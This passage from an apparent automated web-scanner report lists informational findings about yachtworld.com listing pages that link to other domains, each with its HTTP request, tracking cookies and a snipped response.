<li><a href="http://www.yachtworld.fr"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_fr.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.fi"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_fi.gif" alt="" border="0"/>
...[SNIP]...
<li><a onclick="menuClick(this,'ChartersUS')" href="http://www.yachtworldcharters.com/" target="_blank">CHARTERS<!--[if IE 7]>
...[SNIP]...
<li><a onclick="menuClick(this,'ChartersUS:Search')" href="http://www.yachtworldcharters.com/" target="_blank"><span>
...[SNIP]...
<li><a onclick="menuClick(this,'ServicesUS:Transport')" href="http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=US"><span>
...[SNIP]...

12.44. http://www.yachtworld.com/core/listing/boatMergedDetails.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/boatMergedDetails.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.yachtworld.com/core/listing/boatMergedDetails.jsp?boat_id=2266476&ybw=&units=Feet&currency=USD&access=Public&listing_id=53549&url=

The response contains the following links to other domains:

http://boats.com/boat-transport/index.jsp?source=yachtworld
http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=US
http://www.yachtworld.de/
http://www.yachtworld.dk/
http://www.yachtworld.es/
http://www.yachtworld.fi/
http://www.yachtworld.fr/
http://www.yachtworldcharters.com/

Request

GET /core/listing/boatMergedDetails.jsp?boat_id=2266476&ybw=&units=Feet&currency=USD&access=Public&listing_id=53549&url= HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:33:36 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Mon, 24 Jan 2011 21:44:50 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html l
...[SNIP]...
<li><a href="http://www.yachtworld.dk"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_dk.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.de"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_de.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.es"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_es.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.fr"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_fr.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.fi"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_fi.gif" alt="" border="0"/>
...[SNIP]...
<li><a onclick="menuClick(this,'ChartersUS')" href="http://www.yachtworldcharters.com/" target="_blank">CHARTERS<!--[if IE 7]>
...[SNIP]...
<li><a onclick="menuClick(this,'ChartersUS:Search')" href="http://www.yachtworldcharters.com/" target="_blank"><span>
...[SNIP]...
<li><a onclick="menuClick(this,'ServicesUS:Transport')" href="http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=US"><span>
...[SNIP]...
<td class="boatDetailsButton2"><a rel="nofollow" href="http://boats.com/boat-transport/index.jsp?source=yachtworld">Ship It</a>
...[SNIP]...

12.45. http://www.yachtworld.com/core/listing/cache/searchResults.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.yachtworld.com/core/listing/cache/searchResults.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&currencyid=100&cit=true&toLength=32&luom=126&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range&No=10

The response contains the following links to other domains:

http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=US
http://www.yachtworld.de/
http://www.yachtworld.dk/
http://www.yachtworld.es/
http://www.yachtworld.fi/
http://www.yachtworld.fr/
http://www.yachtworldcharters.com/

Request

GET /core/listing/cache/searchResults.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&currencyid=100&cit=true&toLength=32&luom=126&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range&No=10 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.12.10.1296155952; s_pers=%20s_nr%3D1296156045407%7C1298748045407%3B%20s_lv%3D1296156045410%7C1390764045410%3B%20s_lv_s%3DFirst%2520Visit%7C1296157845410%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/cache/searchResults.jsp%2525253FNtk%2525253DboatsEN%25252526searchtype%2525253Dhomepage%25252526fromY%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:20:23 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 91235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
<li><a href="http://www.yachtworld.dk"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_dk.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.de"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_de.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.es"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_es.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.fr"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_fr.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.fi"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_fi.gif" alt="" border="0"/>
...[SNIP]...
<li><a onclick="menuClick(this,'ChartersUS')" href="http://www.yachtworldcharters.com/" target="_blank">CHARTERS<!--[if IE 7]>
...[SNIP]...
<li><a onclick="menuClick(this,'ChartersUS:Search')" href="http://www.yachtworldcharters.com/" target="_blank"><span>
...[SNIP]...
<li><a onclick="menuClick(this,'ServicesUS:Transport')" href="http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=US"><span>
...[SNIP]...

12.46. http://www.yachtworld.com/core/listing/displayPhoto.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/displayPhoto.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.yachtworld.com/core/listing/displayPhoto.jsp?boat_id=2266476&boatname=32%27+32+Regulator+WITH+TRAILER+**REDUCED**&photo_revised_date=1285261228000&photo_name=Photo+1&photo=1&url=&back=%2Fboats%2F2006%2F32-Regulator-With-Trailer-**reduced**-2266476%2FDestin%2FFL%2FUnited-States

The response contains the following links to other domains:

http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=US
http://www.yachtworld.de/
http://www.yachtworld.dk/
http://www.yachtworld.es/
http://www.yachtworld.fi/
http://www.yachtworld.fr/
http://www.yachtworldcharters.com/

Request

GET /core/listing/displayPhoto.jsp?boat_id=2266476&boatname=32%27+32+Regulator+WITH+TRAILER+**REDUCED**&photo_revised_date=1285261228000&photo_name=Photo+1&photo=1&url=&back=%2Fboats%2F2006%2F32-Regulator-With-Trailer-**reduced**-2266476%2FDestin%2FFL%2FUnited-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:31:55 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 23 Sep 2010 17:00:28 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<li><a href="http://www.yachtworld.dk"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_dk.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.de"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_de.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.es"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_es.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.fr"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_fr.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.fi"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_fi.gif" alt="" border="0"/>
...[SNIP]...
<li><a onclick="menuClick(this,'ChartersUS')" href="http://www.yachtworldcharters.com/" target="_blank">CHARTERS<!--[if IE 7]>
...[SNIP]...
<li><a onclick="menuClick(this,'ChartersUS:Search')" href="http://www.yachtworldcharters.com/" target="_blank"><span>
...[SNIP]...
<li><a onclick="menuClick(this,'ServicesUS:Transport')" href="http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=US"><span>
...[SNIP]...

12.47. http://www.yachtworld.com/core/listing/photoGallery.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/photoGallery.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.yachtworld.com/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2266476&boat_id=2266476&back=/core/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States&boat_id=2266476

The response contains the following links to other domains:

http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=US
http://www.yachtworld.de/
http://www.yachtworld.dk/
http://www.yachtworld.es/
http://www.yachtworld.fi/
http://www.yachtworld.fr/
http://www.yachtworldcharters.com/

Request

GET /core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2266476&boat_id=2266476&back=/core/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States&boat_id=2266476 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:33:18 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Mon, 24 Jan 2011 21:44:50 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>
...[SNIP]...
<li><a href="http://www.yachtworld.dk"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_dk.gif" alt="" border="0"/>
...[SNIP]...
